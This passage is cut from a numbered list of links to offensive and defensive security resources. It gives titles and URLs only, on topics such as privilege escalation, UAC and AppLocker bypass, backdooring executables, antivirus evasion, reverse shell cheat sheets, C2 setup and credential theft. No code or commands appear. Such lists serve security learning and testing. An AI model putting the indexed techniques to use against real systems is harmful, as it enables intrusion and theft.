PowerPoint:\n\n\nhttps://www.blackhillsinfosec.com/phishing-with-powerpoint/\n\n\n-173-hide-payload-ms-office-document-properties:\n\n\nhttps://www.blackhillsinfosec.com/hide-payload-ms-office-document-properties/\n\n\n-174-How to Evade Application Whitelisting Using REGSVR32:\n\n\nhttps://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/\n\n\n-175-How to Build a C2 Infrastructure with Digital Ocean – Part 1:\n\n\nhttps://www.blackhillsinfosec.com/build-c2-infrastructure-digital-ocean-part-1/\n\n\n-176-WordPress Penetration Testing using Symposium Plugin SQL Injection:\n\n\nhttp://www.hackingarticles.in/wordpress-penetration-testing-using-symposium-plugin-sql-injection\n\n\n-177-Manual SQL Injection Exploitation Step by Step:\n\n\nhttp://www.hackingarticles.in/manual-sql-injection-exploitation-step-step\n\n\n-178-MSSQL Penetration Testing with Metasploit:\n\n\nhttp://www.hackingarticles.in/mssql-penetration-testing-metasploit\n\n\n-179-Multiple Ways to Get root through Writable File:\n\n\nhttp://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file\n\n\n-180-MySQL Penetration Testing with Nmap:\n\n\nhttp://www.hackingarticles.in/mysql-penetration-testing-nmap\n\n\n-181-NetBIOS and SMB Penetration Testing on Windows:\n\n\nhttp://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows\n\n\n-182-Network Packet Forensic using Wireshark:\n\n\nhttp://www.hackingarticles.in/network-packet-forensic-using-wireshark\n\n\n-183-Escape and Evasion Egressing Restricted Networks:\n\n\nhttps://www.optiv.com/blog/escape-and-evasion-egressing-restricted-networks/\n\n\n-183-Awesome-Hacking-Resources:\n\n\nhttps://github.com/vitalysim/Awesome-Hacking-Resources\n\n\n-184-Hidden directories and les as a source of sensitive information about web application:\n\n\nhttps://medium.com/p/84e5c534e5ad\n\n\n-185-Hiding Registry keys with PSRe ect:\n\n\nhttps://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353\n\n\n-186-awesome-cve-poc:\n\n\nhttps://github.com/qazbnm456/awesome-cve-poc\n\n\n-187-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced:\n\n\nhttps://medium.com/p/74d2bec02099\n\n\n-188-Post Exploitation in Windows using dir Command:\n\n\nhttp://www.hackingarticles.in/post-exploitation-windows-using-dir-command\n\n\n189-Web Application Firewall (WAF) Evasion Techniques #2:\n\n\nhttps://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0\n\n\n-190-Forensics Investigation of Remote PC (Part 1):\n\n\nhttp://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-1\n\n\n-191-CloudFront Hijacking:\n\n\nhttps://www.mindpointgroup.com/blog/pen-test/cloudfront-hijacking/\n\n\n-192-PowerPoint and Custom Actions:\n\n\nhttps://cofense.com/powerpoint-and-custom-actions/\n\n\n-193-Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 using Potato:\n\n\nhttp://www.hackingarticles.in/privilege-escalation-on-windows-7810-server-2008-server-2012-using-potato\n\n\n-194-How to intercept TOR hidden service requests with Burp:\n\n\nhttps://medium.com/p/6214035963a0\n\n\n-195-How to Make a Captive Portal of Death:\n\n\nhttps://medium.com/p/48e82a1d81a/share/twitter\n\n\n-196-How to find any CEO’s email address in minutes:\n\n\nhttps://medium.com/p/70dcb96e02b0\n\n\n197-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass:\n\n\nhttps://www.exploit-db.com/download/44888.txt\n\n\n-198-Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation:\n\n\nhttps://www.exploit-db.com/download/44630.txt\n\n\n-199-Microsoft Word upload to Stored XSS:\n\n\nhttps://www.n00py.io/2018/03/microsoft-word-upload-to-stored-xss/\n\n\n-200-MobileApp-Pentest-Cheatsheet:\n\n\nhttps://github.com/tanprathan/MobileApp-Pentest-Cheatsheet\n\n\n-201-awesome:\n\n\nhttps://github.com/sindresorhus/awesome\n\n\n-201-writing arm shellcode:\n\nhttps://azeria-labs.com/writing-arm-shellcode/\n\n\n-202-debugging with gdb introduction:\n\n\nhttps://azeria-labs.com/debugging-with-gdb-introduction/\n\n\n-203-emulate raspberrypi with qemu:\n\n\nhttps://azeria-labs.com/emulate-raspberry-pi-with-qemu/\n\n\n-204-Bash One-Liner to Check Your Password(s) via pwnedpasswords.com’s API Using the k-Anonymity Method:\n\n\nhttps://medium.com/p/a5807a9a8056\n\n\n-205-A Red Teamer's guide to pivoting:\n\n\nhttps://artkond.com/2017/03/23/pivoting-guide/\n\n\n-206-Using WebDAV features as a covert channel:\n\n\nhttps://arno0x0x.wordpress.com/2017/09/07/using-webdav-features-as-a-covert-channel/\n\n\n-207-A View of Persistence:\n\n\nhttps://rastamouse.me/2018/03/a-view-of-persistence/\n\n\n-208- pupy websocket transport:\n\n\nhttps://bitrot.sh/post/28-11-2017-pupy-websocket-transport/\n\n\n-209-Subdomains Enumeration Cheat Sheet:\n\n\nhttps://pentester.land/cheatsheets/2018/11/.../subdomains-enumeration-cheatsheet.html\n\n\n-210-DNS Reconnaissance – DNSRecon:\n\n\nhttps://pentestlab.blog/2012/11/13/dns-reconnaissance-dnsrecon/\n\n\n-211-Cheatsheets:\n\n\nhttps://bitrot.sh/cheatsheet\n\n\n-212-Understanding Guide to Nmap Firewall Scan (Part 2):\n\n\nhttp://www.hackingarticles.in/understanding-guide-nmap-firewall-scan-part-2\n\n\n-213-Exploit Office 2016 using CVE-2018-0802:\n\n\nhttps://technologyredefine.blogspot.com/2018/01/exploit-office-2016-using-cve-2018-0802.html\n\n\n-214-windows-exploit-suggester:\n\n\nhttps://technologyredefine.blogspot.com/2018/01/windows-exploit-suggester.html\n\n\n-215-INSTALLING PRESISTENCE BACKDOOR IN WINDOWS:\n\n\nhttps://technologyredefine.blogspot.com/2018/01/installing-presistence-backdoor-in.html\n\n\n-216-IDS, IPS AND FIREWALL EVASION USING NMAP:\n\n\nhttps://technologyredefine.blogspot.com/2017/09/ids-ips-and-firewall-evasion-using-nmap.html\n\n\n-217-Wireless Penetration Testing Checklist – A Detailed Cheat Sheet:\n\n\nhttps://gbhackers.com/wireless-penetration-testing-checklist-a-detailed-cheat-sheet\n\n\n218-Most Important Web Application Security Tools & Resources for Hackers and Security Professionals:\n\n\nhttps://gbhackers.com/web-application-security-tools-resources\n\n\n-219-Web Application Penetration Testing Checklist – A Detailed Cheat Sheet:\n\n\nhttps://gbhackers.com/web-application-penetration-testing-checklist-a-detailed-cheat-sheet\n\n\n-220-Top 500 Most Important XSS Script Cheat Sheet for Web Application Penetration Testing:\n\n\nhttps://gbhackers.com/top-500-important-xss-cheat-sheet\n\n\n-221-USBStealer – Password Hacking Tool For Windows Machine Applications:\n\n\nhttps://gbhackers.com/pasword-hacking\n\n\n-222-Most Important Mobile Application Penetration Testing Cheat sheet with Tools & Resources for Security Professionals:\n\n\nhttps://gbhackers.com/mobile-application-penetration-testing\n\n\n-223-Metasploit Can Be Directly Used For Hardware Penetration Testing Now:\n\n\nhttps://gbhackers.com/metasploit-can-be-directly-used-for-hardware-vulnerability-testing-now\n\n\n-224-How to Perform Manual SQL Injection While Pentesting With Single quote Error Based Parenthesis Method:\n\n\nhttps://gbhackers.com/manual-sql-injection-2\n\n\n-225-Email Spoo ng – Exploiting Open Relay configured Public Mailservers:\n\n\nhttps://gbhackers.com/email-spoofing-exploiting-open-relay\n\n\n-226-Email Header Analysis – Received Email is Genuine or Spoofed:\n\n\nhttps://gbhackers.com/email-header-analysis\n\n\n-227-Most Important Cyber Threat Intelligence Tools List For Hackers and Security Professionals:\n\n\nhttps://gbhackers.com/cyber-threat-intelligence-tools\n\n\n-228-Creating and Analyzing a Malicious PDF File with PDF-Parser Tool:\n\n\nhttps://gbhackers.com/creating-and-analyzing-a-malicious-pdf-file-with-pdf-parser-tool\n\n\n-229-Commix – Automated All-in-One OS Command Injection and Exploitation Tool:\n\n\nhttps://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool\n\n\n-230-Advanced ATM Penetration Testing Methods:\n\n\nhttps://gbhackers.com/advanced-atm-penetration-testing-methods\n\n\n-231-A8-Cross-Site Request Forgery (CSRF):\n\n\nhttps://gbhackers.com/a8-cross-site-request-forgery-csrf\n\n\n-232-Fully undetectable backdooring PE File:\n\n\nhttps://haiderm.com/fully-undetectable-backdooring-pe-file/\n\n-233-backdooring exe files:\n\n\nhttps://haiderm.com/tag/backdooring-exe-files/\n\n\n-234-From PHP (s)HELL to Powershell Heaven:\n\n\nhttps://medium.com/p/da40ce840da8\n\n\n-235-Forensic Investigation of Nmap Scan using Wireshark:\n\n\nhttp://www.hackingarticles.in/forensic-investigation-of-nmap-scan-using-wireshark\n\n\n-236-Unleashing an Ultimate XSS Polyglot:\n\n\nhttps://github.com/0xsobky/HackVault/wiki\n\n\n-237-wifi-arsenal:\n\n\nhttps://github.com/0x90/wifi-arsenal\n\n\n-238-XXE_payloads:\n\n\nhttps://gist.github.com/staaldraad/01415b990939494879b4\n\n\n-239-xss_payloads_2016:\n\n\nhttps://github.com/7ioSecurity/XSS-Payloads/raw/master/xss_payloads_2016\n\n\n-240-A curated list of awesome command-line frameworks, toolkits, guides and gizmos. Inspired by awesome-php.:\n\n\nhttps://github.com/alebcay/awesome-shell\n\n\n-241-The goal of this repository is to document the most common techniques to bypass AppLocker.:\n\n\nhttps://github.com/api0cradle/UltimateAppLockerByPassList\n\n\n-242-A curated list of CTF frameworks, libraries, resources and softwares:\n\n\nhttps://github.com/apsdehal/awesome-ctf\n\n\n-243-A collection of android security related resources:\n\n\nhttps://github.com/ashishb/android-security-awesome\n\n\n-244-OSX and iOS related security tools:\n\n\nhttps://github.com/ashishb/osx-and-ios-security-awesome\n\n\n-245-regexp-security-cheatsheet:\n\n\nhttps://github.com/attackercan/regexp-security-cheatsheet\n\n\n-246-PowerView-2.0 tips and tricks:\n\n\nhttps://gist.github.com/HarmJ0y/3328d954607d71362e3c\n\n\n-247-A curated list of awesome awesomeness:\n\n\nhttps://github.com/bayandin/awesome-awesomeness\n\n\n-248-Android App Security Checklist:\n\n\nhttps://github.com/b-mueller/android_app_security_checklist\n\n\n-249-Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat:\n\n\nhttps://github.com/brannondorsey/wifi-cracking\n\n\n-250-My-Gray-Hacker-Resources:\n\n\nhttps://github.com/bt3gl/My-Gray-Hacker-Resources\n\n\n-251-A collection of tools developed by other researchers in the Computer Science area to process network traces:\n\n\nhttps://github.com/caesar0301/awesome-pcaptools\n\n\n-252-A curated list of awesome Hacking tutorials, tools and resources:\n\n\nhttps://github.com/carpedm20/awesome-hacking\n\n\n-253-RFSec-ToolKit is a collection of Radio Frequency Communication Protocol Hacktools.:\n\n\nhttps://github.com/cn0xroot/RFSec-ToolKit\n\n\n-254-Collection of the cheat sheets useful for pentesting:\n\n\nhttps://github.com/coreb1t/awesome-pentest-cheat-sheets\n\n\n-255-Collection of the cheat sheets useful for pentesting:\n\n\nhttps://github.com/coreb1t/awesome-pentest-cheat-sheets\n\n\n-256-Collection of the cheat sheets useful for pentesting:\n\n\nhttps://github.com/coreb1t/awesome-pentest-cheat-sheets\n\n\n-257-A curated list of awesome forensic analysis tools and resources:\n\n\nhttps://github.com/cugu/awesome-forensics\n\n\n-258-Open-Redirect-Payloads:\n\n\nhttps://github.com/cujanovic/Open-Redirect-Payloads\n\n\n-259-A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.:\n\n\nhttps://github.com/Cyb3rWard0g/ThreatHunter-Playbook\n\n\n-260-Windows memory hacking library:\n\n\nhttps://github.com/DarthTon/Blackbone\n\n\n-261-A collective list of public JSON APIs for use in security.:\n\n\nhttps://github.com/deralexxx/security-apis\n\n\n-262-An authoritative list of awesome devsecops tools with the help from community experiments and contributions.:\n\n\nhttps://github.com/devsecops/awesome-devsecops\n\n\n-263-List of Awesome Hacking places, organised by Country and City, listing if it features power and wifi:\n\n\nhttps://github.com/diasdavid/awesome-hacking-spots\n\n\n-264-A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups:\n\n\nhttps://github.com/djadmin/awesome-bug-bounty\n\n\n-265-Notes for taking the OSCP in 2097:\n\n\nhttps://github.com/dostoevskylabs/dostoevsky-pentest-notes\n\n\n-266-A curated list of awesome Windows Exploitation resources, and shiny things. Inspired by awesom:\n\n\nhttps://github.com/enddo/awesome-windows-exploitation\n\n\n-267-A curated list of resources (books, tutorials, courses, tools and vulnerable applications) for learning about Exploit Development:\n\n\nhttps://github.com/FabioBaroni/awesome-exploit-development\n\n\n-268-A curated list of awesome reversing resources:\n\n\nhttps://github.com/fdivrp/awesome-reversing\n\n\n-269-Git All the Payloads! A collection of web attack payloads:\n\n\nhttps://github.com/foospidy/payloads\n\n\n-270-GitHub Project Resource List:\n\n\nhttps://github.com/FuzzySecurity/Resource-List\n\n\n-271-Use your macOS terminal shell to do awesome things.:\n\n\nhttps://github.com/herrbischoff/awesome-macos-command-line\n\n\n-272-Defeating Windows User Account Control:\n\n\nhttps://github.com/hfiref0x/UACME\n\n\n-273-Free Security and Hacking eBooks:\n\nhttps://github.com/Hack-with-Github/Free-Security-eBooks\n\n\n-274-Universal Radio Hacker: investigate wireless protocols like a boss:\n\n\nhttps://github.com/jopohl/urh\n\n\n-275-A curated list of movies every hacker & cyberpunk must watch:\n\n\nhttps://github.com/k4m4/movies-for-hackers\n\n\n-276-Various public documents, whitepapers and articles about APT campaigns:\n\n\nhttps://github.com/kbandla/APTnotes\n\n\n-277-A database of common, interesting or useful commands, in one handy referable form:\n\n\nhttps://github.com/leostat/rtfm\n\n\n-278-A curated list of tools for incident response:\n\n\nhttps://github.com/meirwah/awesome-incident-response\n\n\n-279-A curated list of awesome guides, tools, and other resources related to the security and compromise of locks, safes, and keys:\n\n\nhttps://github.com/meitar/awesome-lockpicking\n\n\n-280-A curated list of static analysis tools, linters and code quality checkers for various programming languages:\n\n\nhttps://github.com/mre/awesome-static-analysis\n\n\n-281-A Collection of Hacks in IoT Space so that we can address them (hopefully):\n\n\nhttps://github.com/nebgnahz/awesome-iot-hacks\n\n\n-281-A Course on Intermediate Level Linux Exploitation:\n\n\nhttps://github.com/nnamon/linux-exploitation-course\n\n\n-282-Kali Linux Cheat Sheet for Penetration Testers:\n\n\nhttps://github.com/NoorQureshi/kali-linux-cheatsheet\n\n\n-283-A curated list of awesome infosec courses and training resources.:\n\n\nhttps://github.com/onlurking/awesome-infosec\n\n\n-284-A curated list of resources for learning about application security:\n\n\nhttps://github.com/paragonie/awesome-appsec\n\n\n-285-an awesome list of honeypot resources:\n\n\nhttps://github.com/paralax/awesome-honeypots\n\n\n\n286-GitHub Enterprise SQL Injection:\n\n\nhttps://www.blogger.com/share-post.g?blogID=2987759532072489303&postID=6980097238231152493\n\n\n-287-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis:\n\n\nhttps://github.com/secfigo/Awesome-Fuzzing\n\n\n-288-PHP htaccess injection cheat sheet:\n\n\nhttps://github.com/sektioneins/pcc/wiki\n\n\n-289-A curated list of the awesome resources about the Vulnerability Research:\n\n\nhttps://github.com/sergey-pronin/Awesome-Vulnerability-Research\n\n\n-290-A list of useful payloads and bypass for Web Application Security and Pentest/CTF:\n\n\nhttps://github.com/swisskyrepo/PayloadsAllTheThings\n\n\n-291-A collection of Red Team focused tools, scripts, and notes:\n\n\nhttps://github.com/threatexpress/red-team-scripts\n\n\n-292-Awesome XSS stuff:\n\n\nhttps://github.com/UltimateHackers/AwesomeXSS\n\n\n-293-A collection of hacking / penetration testing resources to make you better!:\n\n\nhttps://github.com/vitalysim/Awesome-Hacking-Resources\n\n\n-294-Docker Cheat Sheet:\n\n\nhttps://github.com/wsargent/docker-cheat-sheet\n\n\n-295-Decrypted content of eqgrp-auction-file.tar.xz:\n\n\nhttps://github.com/x0rz/EQGRP\n\n\n-296-A bunch of links related to Linux kernel exploitation:\n\n\nhttps://github.com/xairy/linux-kernel-exploitation\n\n\n-297-Penetration Testing 102 - Windows Privilege Escalation Cheatsheet:\n\n\nwww.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet\n\n\n-298-Pentesting Cheatsheet:\n\n\nhttps://anhtai.me/pentesting-cheatsheet/\n\n\n-299-Windows Privilege Escalation Methods for Pentesters:\n\n\nhttps://pentest.blog/windows-privilege-escalation-methods-for-pentesters/\n\n\n-300-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection:\n\n\n-301-Reading Your Way Around UAC (Part 1):\n\n\nhttps://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html\n\n\n\n-302--Reading Your Way Around UAC (Part 2):\n\n\nhttps://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html\n\n\n\n-303-Executing Metasploit & Empire Payloads from MS Office Document Properties (part 2 of 2):\n\n\nhttps://stealingthe.network/executing-metasploit-empire-payloads-from-ms-office-document-properties-part-2-of-2/\n\n\n-304-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1:\n\n\nhttps://medium.com/p/29d034c27978\n\n\n-304-Automating Cobalt Strike,Aggressor Collection Scripts:\n\n\n\nhttps://github.com/bluscreenofjeff/AggressorScripts\n\n\n\nhttps://github.com/harleyQu1nn/AggressorScripts\n\n\n-305-Vi Cheat Sheet:\n\n\nhttps://highon.coffee/blog/vi-cheat-sheet/\n\n\n-306-Network Recon Cheat Sheet:\n\n\nhttps://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/\n\n\n-307-LFI Cheat Sheet:\n\n\nhttps://highon.coffee/blog/lfi-cheat-sheet/\n\n\n-308-Systemd Cheat Sheet:\n\n\nhttps://highon.coffee/blog/systemd-cheat-sheet/\n\n\n-309-Aircrack-ng Cheatsheet:\n\n\nhttps://securityonline.info/aircrack-ng-cheatsheet/\n\n\n-310-Kali Linux Cheat Sheet for Penetration Testers:\n\n\nhttps://www.blackmoreops.com/?p=7212\n\n\n\n-311-Wifi Pentesting Command Cheatsheet:\n\n\nhttps://randomkeystrokes.com/2016/07/01/wifi-pentesting-cheatsheet/\n\n\n-312-Android Testing Environment Cheatsheet (Part 1):\n\n\nhttps://randomkeystrokes.com/2016/10/17/android-testing-environment-cheatsheet/\n\n\n-313-cheatsheet:\n\n\nhttps://randomkeystrokes.com/category/cheatsheet/\n\n\n-314-Reverse Shell Cheat Sheet:\n\n\nhttps://highon.coffee/blog/reverse-shell-cheat-sheet/\n\n\n-315-Linux Commands Cheat Sheet:\n\n\nhttps://highon.coffee/blog/linux-commands-cheat-sheet/\n\n\n-316-Linux Privilege Escalation using Sudo Rights:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights\n\n\n-317-Linux Privilege Escalation using Misconfigured NFS:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/\n\n\n-318-Linux Privilege Escalation by Exploiting Cronjobs:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/\n\n\n-319-Web Penetration Testing:\n\n\nhttp://www.hackingarticles.in/web-penetration-testing/\n\n\n-320-Webshell to Meterpreter:\n\n\nhttp://www.hackingarticles.in/webshell-to-meterpreter\n\n\n-321-WordPress Penetration Testing using WPScan & Metasploit:\n\n\nhttp://www.hackingarticles.in/wordpress-penetration-testing-using-wpscan-metasploit\n\n\n-322-XSS Exploitation in DVWA (Bypass All Security):\n\n\nhttp://www.hackingarticles.in/xss-exploitation-dvwa-bypass-security\n\n\n-323-Linux Privilege Escalation Using PATH Variable:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/\n\n\n-324-VNC tunneling over SSH:\n\n\nhttp://www.hackingarticles.in/vnc-tunneling-ssh\n\n\n-325-VNC Pivoting through Meterpreter:\n\n\nhttp://www.hackingarticles.in/vnc-pivoting-meterpreter\n\n\n-326-Week of Evading Microsoft ATA - Announcement and Day 1:\n\n\nhttps://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html\n\n\n-327-Abusing DNSAdmins privilege for escalation in Active Directory:\n\n\nhttps://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html\n\n\n-328-Using SQL Server for attacking a Forest Trust:\n\n\nhttps://www.labofapenetrationtester.com/2017/03/using-sql-server-for-attacking-forest-trust.html\n\n\n-329-Empire :\n\n\nhttp://www.harmj0y.net/blog/category/empire/\n\n\n-330-8 Deadly Commands You Should Never Run on Linux:\n\n\nhttps://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/\n\n\n-331-External C2 framework for Cobalt Strike:\n\n\nhttps://www.insomniacsecurity.com/2018/01/11/externalc2.html\n\n\n-332-How to use Public IP on Kali Linux:\n\n\nhttp://www.hackingarticles.in/use-public-ip-kali-linux\n\n\n-333-Bypass Admin access through guest Account in windows 10:\n\n\nhttp://www.hackingarticles.in/bypass-admin-access-guest-account-windows-10\n\n\n-334-Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports):\n\n\nhttp://www.hackingarticles.in/bypass-firewall-restrictions-metasploit-reverse_tcp_allports\n\n\n-335-Bypass SSH Restriction by Port Relay:\n\n\nhttp://www.hackingarticles.in/bypass-ssh-restriction-by-port-relay\n\n\n-336-Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key):\n\n\nhttp://www.hackingarticles.in/bypass-uac-protection-remote-windows-10-pc-via-fodhelper-registry-key\n\n\n-337-Bypass UAC in Windows 10 using bypass_comhijack Exploit:\n\n\nhttp://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit\n\n\n-338-Bind Payload using SFX archive with Trojanizer:\n\n\nhttp://www.hackingarticles.in/bind-payload-using-sfx-archive-trojanizer\n\n\n-339-Capture NTLM Hashes using PDF (Bad-Pdf):\n\n\nhttp://www.hackingarticles.in/capture-ntlm-hashes-using-pdf-bad-pdf\n\n\n-340-Best of Post Exploitation Exploits & Tricks:\n\n\nhttp://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks/\n\n\n-341-Detect SQL Injection Attack using Snort IDS:\n\n\nhttp://www.hackingarticles.in/detect-sql-injection-attack-using-snort-ids/\n\n\n-342-Beginner Guide to Website Footprinting:\n\n\nhttp://www.hackingarticles.in/beginner-guide-website-footprinting/\n\n\n-343-How to Enable and Monitor Firewall Log in Windows PC:\n\n\nhttp://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/\n\n\n-344-Wifi Post Exploitation on Remote PC:\n\n\nhttp://www.hackingarticles.in/wifi-post-exploitation-remote-pc/\n\n\n-335-Check Meltdown Vulnerability in CPU:\n\n\nhttp://www.hackingarticles.in/check-meltdown-vulnerability-cpu\n\n\n-336-XXE:\n\n\nhttps://phonexicum.github.io/infosec/xxe.html\n\n\n-337-[XSS] Re ected XSS Bypass Filter:\n\n\nhttps://medium.com/p/de41d35239a3\n\n\n-338-Engagement Tools Tutorial in Burp suite:\n\n\nhttp://www.hackingarticles.in/engagement-tools-tutorial-burp-suite\n\n\n-339-Wiping Out CSRF:\n\n\nhttps://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f\n\n\n-340-First entry: Welcome and fileless UAC bypass:\n\n\nhttps://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/\n\n\n-341-Writing a Custom Shellcode Encoder:\n\n\nhttps://medium.com/p/31816e767611\n\n\n-342-Security Harden CentOS 7 :\n\n\nhttps://highon.coffee/blog/security-harden-centos-7/\n\n\n-343-THE BIG BAD WOLF - XSS AND MAINTAINING ACCESS:\n\n\nhttps://www.paulosyibelo.com/2018/06/the-big-bad-wolf-xss-and-maintaining.html\n\n\n-344-MySQL:\n\n\nhttps://websec.ca/kb/CHANGELOG.txt\n\n\n-345-Deobfuscation of VM based software protection:\n\n\nhttp://shell-storm.org/talks/SSTIC2017_Deobfuscation_of_VM_based_software_protection.pdf\n\n\n-346-Online Assembler and Disassembler:\n\n\nhttp://shell-storm.org/online/Online-Assembler-and-Disassembler/\n\n\n-347-Shellcodes database for study cases:\n\n\nhttp://shell-storm.org/shellcode/\n\n\n-348-Dynamic Binary Analysis and Obfuscated Codes:\n\n\nhttp://shell-storm.org/talks/sthack2016-rthomas-jsalwan.pdf\n\n\n-349-How Triton may help to analyse obfuscated binaries:\n\n\nhttp://triton.quarkslab.com/files/misc82-triton.pdf\n\n\n-350-Triton: A Concolic Execution Framework:\n\n\nhttp://shell-storm.org/talks/SSTIC2015_English_slide_detailed_version_Triton_Concolic_Execution_FrameWork_FSaudel_JSalwan.pdf\n\n\n-351-Automatic deobfuscation of the Tigress binary protection using symbolic execution and LLVM:\n\n\nhttps://github.com/JonathanSalwan/Tigress_protection\n\n\n-352-What kind of semantics information Triton can provide?:\n\n\nhttp://triton.quarkslab.com/blog/What-kind-of-semantics-information-Triton-can-provide/\n\n\n-353-Code coverage using a dynamic symbolic execution:\n\n\nhttp://triton.quarkslab.com/blog/Code-coverage-using-dynamic-symbolic-execution/\n\n\n-354-Triton (concolic execution framework) under the hood:\n\n\nhttp://triton.quarkslab.com/blog/first-approach-with-the-framework/\n\n\n-355-- Stack and heap overflow detection at runtime via behavior analysis and Pin:\n\n\nhttp://shell-storm.org/blog/Stack-and-heap-overflow-detection-at-runtime-via-behavior-analysis-and-PIN/\n\n\n-356-Binary analysis: Concolic execution with Pin and z3:\n\n\nhttp://shell-storm.org/blog/Binary-analysis-Concolic-execution-with-Pin-and-z3/\n\n\n-357-In-Memory fuzzing with Pin:\n\n\nhttp://shell-storm.org/blog/In-Memory-fuzzing-with-Pin/\n\n\n-358-Hackover 2015 r150 (outdated solving for Triton use cases):\n\n\nhttps://github.com/JonathanSalwan/Triton/blob/master/src/examples/python/ctf-writeups/hackover-ctf-2015-r150/solve.py\n\n\n-359-Skip sh – Web Application Security Scanner for XSS, SQL Injection, Shell injection:\n\n\nhttps://gbhackers.com/skipfish-web-application-security-scanner\n\n\n-360-Sublist3r – Tool for Penetration testers to Enumerate Sub-domains:\n\n\nhttps://gbhackers.com/sublist3r-penetration-testers\n\n\n-361-bypassing application whitelisting with bginfo:\n\n\n\nhttps://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/\n\n\n-362-accessing-clipboard-from-the-lock-screen-in-windows-10:\n\n\nhttps://oddvar.moe/2017/01/24/accessing-clipboard-from-the-lock-screen-in-windows-10/\n\n\n-363-bypassing-device-guard-umci-using-chm-cve-2017-8625:\n\n\nhttps://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/\n\n\n-364-defense-in-depth-writeup:\n\n\nhttps://oddvar.moe/2017/09/13/defense-in-depth-writeup/\n\n\n-365-applocker-case-study-how-insecure-is-it-really-part-1:\n\n\nhttps://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/\n\n\n-366-empires-cross-platform-office-macro:\n\n\nhttps://www.blackhillsinfosec.com/empires-cross-platform-office-macro/\n\n\n-367-recon tools:\n\n\nhttps://blackarch.org/recon.html\n\n\n-368-Black Hat 2018 tools list:\n\n\nhttps://medium.com/p/991fa38901da\n\n\n-369-Application Introspection & Hooking With Frida:\n\n\nhttps://www.fuzzysecurity.com/tutorials/29.html\n\n\n-370-And I did OSCP!:\n\n\nhttps://medium.com/p/589babbfea19\n\n\n-371-CoffeeMiner: Hacking WiFi to inject cryptocurrency miner to HTML requests:\n\n\nhttps://arnaucube.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html\n\n\n-372-Most Important Endpoint Security & Threat Intelligence Tools List for Hackers and Security Professionals:\n\n\nhttps://gbhackers.com/threat-intelligence-tools\n\n\n-373-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection:\n\n\nhttps://techincidents.com/penetration-testing-cheat-sheet/\n\n\n-374-privilege escalation:\n\n\nhttps://toshellandback.com/category/privilege-escalation/\n\n\n-375-The Complete List of Windows Post-Exploitation Commands (No Powershell):\n\n\nhttps://medium.com/p/999b5433b61e\n\n\n-376-The Art of Subdomain Enumeration:\n\n\nhttps://blog.sweepatic.com/tag/subdomain-enumeration/\n\n\n-377-The Principles of a Subdomain Takeover:\n\n\nhttps://blog.sweepatic.com/subdomain-takeover-principles/\n\n\n-378-The journey of Web Cache + Firewall Bypass to SSRF to AWS credentials compromise!:\n\n\nhttps://medium.com/p/b250fb40af82\n\n\n-379-The Solution for Web for Pentester-I:\n\n\nhttps://medium.com/p/4c21b3ae9673\n\n\n-380-The Ultimate Penetration Testing Command Cheat Sheet for Linux:\n\n\nhttps://www.hackingloops.com/command-cheat-sheet-for-linux/\n\n\n-381-: Ethical Hacking, Hack Tools, Hacking Tricks, Information Gathering, Penetration Testing, Recommended:\n\n\nhttps://www.hackingloops.com/hacking-tricks/\n\n\n-383-Introduction to Exploitation, Part 1: Introducing Concepts and Terminology:\n\n\nhttps://www.hackingloops.com/exploitation-terminology/\n\n\n-384-How Hackers Kick Victims Off of Wireless Networks:\n\n\nhttps://www.hackingloops.com/kick-victims-off-of-wireless-networks/\n\n\n-385-Maintaining Access Part 1: Introduction and Metasploit Example:\n\n\nhttps://www.hackingloops.com/maintaining-access-metasploit/\n\n\n-386-How to Steal Windows Credentials with Mimikatz and Metasploit:\n\n\nhttps://www.hackingloops.com/mimikatz/\n\n\n-387-Evading Anti-virus Part 2: Obfuscating Payloads with Msfvenom:\n\n\nhttps://www.hackingloops.com/msfvenom/\n\n\n-388-Evading Anti-virus Part 1: Infecting EXEs with Shellter:\n\n\nhttps://www.hackingloops.com/evading-anti-virus-shellter/\n\n\n-389-Mobile 